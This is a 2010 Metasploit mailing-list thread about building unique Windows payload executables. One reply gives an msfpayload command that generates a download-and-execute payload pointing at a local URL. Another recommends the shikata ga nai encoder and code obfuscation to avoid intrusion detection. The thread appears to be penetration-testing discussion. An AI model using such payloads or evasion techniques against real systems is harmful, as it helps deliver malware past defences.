Re: Dynamic creation of payload executables with metasm

[scriptjunkie <scriptjunkie1 () googlemail com>]

The easiest way would be to use one of the encoder stubs. shikata ga
nai is probably the best in the framework. But since it has been
public for a while, maybe some intrusion detection systems can spot
it. If you're writing your own shellcode, you're probably really
paranoid, and you may prefer to do some code obfuscation on the fly.
Look at msf3/lib/msf/util/exe.rb at the win32_rwx_exec method for an
example of doing this.

On Mon, May 31, 2010 at 12:21 PM, John Biondolillo
<johnb.electric () gmail com> wrote:
> The best results I've gotten appear to be from ndisasm but i have yet to go
> through the code but it at least is completely converted unlike IDA. That
> was really the easy part though I'm really interested on the plan for unique
> binaries so I'm studying up on encoders, again I've only been messing with
> assembly for about two weeks so this is all a little slow going so any tips
> would be great.
>
>
>
> On Mon, May 31, 2010 at 5:50 AM, John Biondolillo <johnb.electric () gmail com>
> wrote:
> > I'm on my windows 7 box so i tried using ida but it doesn't like analyzing
> > raw binary code so it didn't convert all the opcodes into asm. I'll try it
> > on my linux box. Thanks
> >
> > On Mon, May 31, 2010 at 2:23 AM, Eric <dkn4a1 () gmail com> wrote:
> > > Well, i wud like to give an attempt to answer ur 1st question, not sure
> > > abt the second one.
> > > On Mon, May 31, 2010 at 12:03 AM, John Biondolillo
> > > <johnb.electric () gmail com> wrote:
> > > > I know this is in the works but since I'm impatient I started working on
> > > > it my self. I've got a basic payload that just displays a message box with
> > > > user supplied data, its portable code so it can be used from Windows 2000 -
> > > > Windows 7, but I'm new to assembly so there is no polymorphism meaning if
> > > > you create two payloads with the same input they'd be identical I'm guessing
> > > > this is were the encoders come in.
> > > > I have two questions:
> > > >
> > > > 1.  I can't find the asm source for download_exec, since its a simple
> > > > payload its the next one I want to do, theres a million examples online but
> > > > the one in the framework seems to be very reliable.Can anyone point me in
> > > > the right direction to find it.
> > > on a linux box, with metasploit installed on it
> > > $ msfpayload windows/download_exec URL=http://192.168.1.1/download.exe R
> > > > download_exec_payload
> > > $ ndisasm -b 32 download_exec_payload > asm_code
> > > As, you may already be knowing that this payload creates an executable
> > > named "a.exe" in the PWD of exploited process.
> > >
> > > > 2. Whats this best way to make each payload unique, adding junk code,
> > > > random characters were able in the header, or just try to use one of the
> > > > encoder stubs?
> > > >
> > > > Thanks
> > > >
> > > > John
> > > >
> > > > _______________________________________________
> > > > https://mail.metasploit.com/mailman/listinfo/framework
>
>
> _______________________________________________
> https://mail.metasploit.com/mailman/listinfo/framework



-- 
scriptjunkie
https://scriptjunkie1.wordpress.com/
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework